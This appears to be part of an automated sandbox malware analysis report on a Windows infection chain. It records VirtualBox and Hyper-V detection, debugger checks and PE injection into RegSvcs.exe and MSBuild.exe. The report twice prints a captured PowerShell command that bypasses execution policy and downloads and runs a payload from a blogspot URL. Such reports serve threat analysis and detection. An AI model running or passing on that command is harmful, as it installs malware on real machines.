Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\fontdrvhost.exe	API/Special instruction interceptor: Address: 7FF8148AD044
Source: C:\Windows\SysWOW64\fontdrvhost.exe	API/Special instruction interceptor: Address: 4FAB83A

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Windows\SysWOW64\fontdrvhost.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: fontdrvhost.exe, 00000021.00000002.1899301362.0000000003040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.E
Source: fontdrvhost.exe, 00000021.00000002.1899301362.0000000003040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: fontdrvhost.exe, 00000021.00000002.1899301362.0000000003040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE
Source: fontdrvhost.exe, 00000021.00000002.1899301362.0000000003040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE
Source: fontdrvhost.exe, 00000021.00000002.1899301362.0000000003040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HACKER.EXEIDAQ64.EXEAUTORUNS.EXEDUMPCAP.EXEDE4
Source: fontdrvhost.exe, 00000021.00000002.1899301362.0000000003040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE

Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: EB0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 4BF0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: EA0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 2C10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 4C10000 memory commit \| memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\fontdrvhost.exe	File opened / queried: VBoxGuest
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Windows\SysWOW64\fontdrvhost.exe	File opened / queried: C:\Windows\SysWOW64\vboxservice.exe
Source: C:\Windows\SysWOW64\fontdrvhost.exe	File opened / queried: C:\Windows\SysWOW64\vboxtray.exe
Source: C:\Windows\SysWOW64\fontdrvhost.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys
Source: C:\Windows\SysWOW64\fontdrvhost.exe	File opened / queried: VBoxTrayIPC
Source: C:\Windows\SysWOW64\fontdrvhost.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sys
Source: C:\Windows\SysWOW64\fontdrvhost.exe	File opened / queried: C:\Windows\SysWOW64\vboxhook.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate
Source: C:\Windows\SysWOW64\fontdrvhost.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Windows\SysWOW64\fontdrvhost.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sys
Source: C:\Windows\SysWOW64\fontdrvhost.exe	File opened / queried: VBoxMiniRdrDN
Source: C:\Windows\SysWOW64\fontdrvhost.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sys
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Code function: 33_3_04F10068 rdtsc

33_3_04F10068

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 20_2_056F5E9B str word ptr [ebx]

20_2_056F5E9B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 430			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9464			Jump to behavior

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_33-4047

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8252	Thread sleep time: -3689348814741908s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8220	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard

Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 19_2_058878D9 GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,_wcsnicmp,_snwprintf,lstrcpyW,

19_2_058878D9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 19_2_0588716F VirtualQuery,VirtualQuery,memset,GetSystemInfo,memset,VirtualQuery,

19_2_0588716F

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_46df13dc-81ea-4a25-b367-c2dbbfe6f84f\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_85e6ddd5-e3ce-4017-bbdc-80a37d168c06\

Source: fontdrvhost.exe, 00000021.00000003.1828887101.0000000002B74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -Windows-Hyper-V-HypervisorMicrosoft-Windows-IphlpsvcMicrosoft-Windows-IsolatedUserModeMicrosoft-Windows-K-k)
Source: fontdrvhost.exe, 00000021.00000003.1820158660.0000000002B43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Windows\System32\drivers\VBoxMouse.systa
Source: fontdrvhost.exe, 00000021.00000003.1828887101.0000000002B74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -Windows-Hyper-V-Hypervisor
Source: fontdrvhost.exe, 00000021.00000003.1825773485.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ws\System32\drivers\VBoxGuest.sysC:9
Source: ModuleAnalysisCache.17.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: fontdrvhost.exe, 00000021.00000002.1889822042.0000000002B6D000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1828887101.0000000002B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HMicrosoft-Windows-Hyper-V-Hypervisor
Source: Amcache.hve.27.dr	Binary or memory string: VMware, Inc.
Source: fontdrvhost.exe, 00000021.00000003.1828887101.0000000002B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: fontdrvhost.exe, 00000021.00000002.1889822042.0000000002ACA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: ModuleAnalysisCache.17.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Amcache.hve.27.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.27.dr	Binary or memory string: VMware-42 27 c8 0c e4 52 1d cc-a0 8f d3 a4 82 3e 8f 04
Source: RegSvcs.exe, 00000014.00000002.1790344128.00000000056E3000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: D]>NhgFs
Source: fontdrvhost.exe, 00000021.00000003.1828887101.0000000002B74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ual Disk ServicevmcivolmgrVolsnapvpciv
Source: fontdrvhost.exe, 00000021.00000003.1794426935.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: fontdrvhost.exe, 00000021.00000002.1889822042.0000000002B60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1826673284.0000000002B5D000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1821193801.0000000002B60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1827481973.0000000002B61000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1829028344.0000000002B60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: fontdrvhost.exe, 00000021.00000002.1889822042.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000002.1889822042.0000000002ACA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: fontdrvhost.exe, 00000021.00000002.1889822042.0000000002B60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1826673284.0000000002B5D000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1821193801.0000000002B60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1827481973.0000000002B61000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1829028344.0000000002B60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_PnPEntityMicrosoft Hyper-V Generation Counter{4d36e97d-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityMicrosoft Hyper-V Generation CounterACPI\VMW0001\7System.String[]MicrosoftMicrosoft Hyper-V Generation CounterSystemACPI\VMW0001\7gencounterOKWin32_ComputerSystemuser-PCLMEM
Source: fontdrvhost.exe, 00000021.00000003.1794426935.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: fontdrvhost.exe, 00000021.00000003.1829028344.0000000002B66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HMicrosoft-Windows-Hyper-V-HypervisorF
Source: ModuleAnalysisCache.17.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000011.00000002.2532186545.0000023AD04C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Code function: 33_3_04F10068 rdtsc

33_3_04F10068

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05888BD0 mov eax, dword ptr fs:[00000030h]	19_2_05888BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_058887FF mov eax, dword ptr fs:[00000030h]	19_2_058887FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0588B22E mov eax, dword ptr fs:[00000030h]	19_2_0588B22E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_05521277 mov eax, dword ptr fs:[00000030h]	20_2_05521277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056E87FF mov eax, dword ptr fs:[00000030h]	20_2_056E87FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056E8BD0 mov eax, dword ptr fs:[00000030h]	20_2_056E8BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056EB22E mov eax, dword ptr fs:[00000030h]	20_2_056EB22E
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 32_3_02F00283 mov eax, dword ptr fs:[00000030h]	32_3_02F00283
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_2_02BC87FF mov eax, dword ptr fs:[00000030h]	33_2_02BC87FF
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 33_2_02BC8BD0 mov eax, dword ptr fs:[00000030h]	33_2_02BC8BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 19_2_0588B701 GetProcessHeap,RtlAllocateHeap,IsBadReadPtr,RtlAllocateHeap,VirtualFree,RtlAllocateHeap,

19_2_0588B701

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 19.2.RegSvcs.exe.3346834.1.raw.unpack, Flutter.cs	Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
Source: 19.2.RegSvcs.exe.3346834.1.raw.unpack, Flutter.cs	Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
Source: 19.2.RegSvcs.exe.3346834.1.raw.unpack, Flutter.cs	Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 540000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 548000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DFE008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 540000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 548000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D14008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 540000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 548000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 879008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 540000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 548000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: FFC008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 540000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 548000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 90C008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 540000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 548000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 846008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
